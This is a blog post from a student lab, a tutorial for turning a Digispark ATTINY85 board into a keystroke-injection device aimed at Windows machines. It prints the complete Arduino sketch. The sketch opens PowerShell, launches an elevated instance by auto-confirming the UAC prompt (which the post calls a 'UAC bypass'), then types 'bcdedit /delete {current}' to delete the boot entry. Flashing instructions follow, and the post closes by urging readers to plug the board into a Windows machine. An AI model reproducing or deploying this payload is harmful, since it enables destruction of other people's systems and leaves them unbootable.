How We Used a $2 Chip and PowerShell to Take Down Windows in Seconds
Bare-metal programming an ATTINY85 board for destroying windows 10-11 machines in seconds
The first and only student run multi-disciplinary lab of SRM University at Chennai and Amaravati.
Prerequisites
Before you start reading, might wanna try looking up Digispark ATTINY85 boards, firmware, Arduino IDE, booting in Windows and finally Arduino C++, PowerShell commands and the Digispark Library.
Scripting time
We’ll load up the Arduino IDE (which is a Code Editor), and start writing our script. We’ll be using a mocktail of Arduino C++ with some PowerShell and the Digispark Library for this script.
#include "DigiKeyboard.h"
void setup() {
// No setup needed
}
This is some boiler-plate code
Launching PowerShell
void loop() {
DigiKeyboard.delay(2000); // Wait for 2 seconds before executing commands
// Open the Run dialog
DigiKeyboard.sendKeyStroke(0); // Send no key to clear any previous key presses
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Windows + R to open Run dialog
DigiKeyboard.delay(600); // Wait for the dialog to open
This snippet opens up run.exe
// Open PowerShell
DigiKeyboard.print(F("powershell"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
// Wait for PowerShell to open
DigiKeyboard.delay(2000);
We wait for a powershell window to open. Enter key is spammed repeatedly to ensure the commands are registered
Bypassing UAC for Elevated PowerShell
Now, we open the administrator PowerShell through a UAC bypass
// Execute command to open a new elevated PowerShell instance
DigiKeyboard.print(F("start-process powershell -verb runas"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
// Delay to allow the UAC prompt to appear
DigiKeyboard.delay(700);
// Navigate to the Yes button (left arrow key) and press Enter
DigiKeyboard.sendKeyStroke(KEY_LEFT_ARROW); // Move to 'Yes'
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER); // Confirm UAC prompt
// Wait for the elevated PowerShell window to open fully
DigiKeyboard.delay(1000);
Final Payload - Deleting Boot Entry
Finally, we now register a command that will delete the boot entry for the current OS loaded, and set the process to loop to ensure that on the script crashing, we can restart.
// Now you can execute your commands in the elevated PowerShell
DigiKeyboard.print(F("bcdedit /delete {current}"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
for(;;) { /* Infinite loop to keep the script running */ }
}
Importing the Digispark Libraries
The Digispark library refers to a collection of software libraries specifically designed to work with the Digispark development board, which is based on the ATtiny85 microcontroller. These libraries extend the capabilities of the Digispark by providing pre-written code that makes it easier to use hardware features and interact with peripherals.
Go to Board Manager and add this URL:
https://drazzy.com/package_drazzy.com_index.json
Then search for ATTinyCore and install the top result.
Cool! Now let’s see how to actually put our code into the board.
How the Arduino IDE works
Preprocessing of
.inofile:The Arduino IDE converts the
.inosketch into a.cppfile (standard C++ source code). It automatically adds function prototypes (likevoid setup();) at the top if you didn’t write them.Compilation:
The resulting
.cppfile is compiled using avr-g++ (for AVR boards like Uno, Mega) or other platform-specific compilers (likearm-none-eabi-g++for ARM boards). Your code is compiled along with core Arduino libraries and the Digispark library you've included.Linking: All compiled object files (
.o) are linked together into a single binary (.elfor.hexfile), which is the actual machine code representation.Output Generation: The final output is a
.hexfile (Intel HEX format), which contains the binary machine code instructions. This.hexfile is what gets uploaded to your Arduino board when you click "Upload".
The resultant hex file will look somewhat like this:
:100000000C9434000C944E000C944E000C944E00A4
...
Uploading the firmware
We’ll be using micronucleus here as the firmware since we used that for the experiement.
We need to choose our specific board, here it is Board: Digispark (Default - 16.5mhz) . Once compiled, the .hex file is generated, and you’ll see the path in the verbose output.
We’ll get a verbose output in the Arduino IDE console, let’s copy the path to the hex file
/tmp/arduino_build_123456/sketch/Blink.ino.hex
Now let’s start flashing, we’ll run the micronucleus CLI and put the file path as our argument
$: micronucleus /tmp/arduino_build_123456/sketch/Blink.ino.hex
Starting Micronucleus uploader...
Please plug in your Digispark now (within 30 seconds)...
Now we plug in our ATTINY85 board
Compilation and FlashingFound Digispark device (VID: 16C0, PID: 05DC)
Uploading the sketch...
Done!
Source to firmware: https://github.com/micronucleus/micronucleus
Now, find a Windows machine, plug the board in, wait 5 seconds, and… you’re off to the races! Subscribe for more cool content!
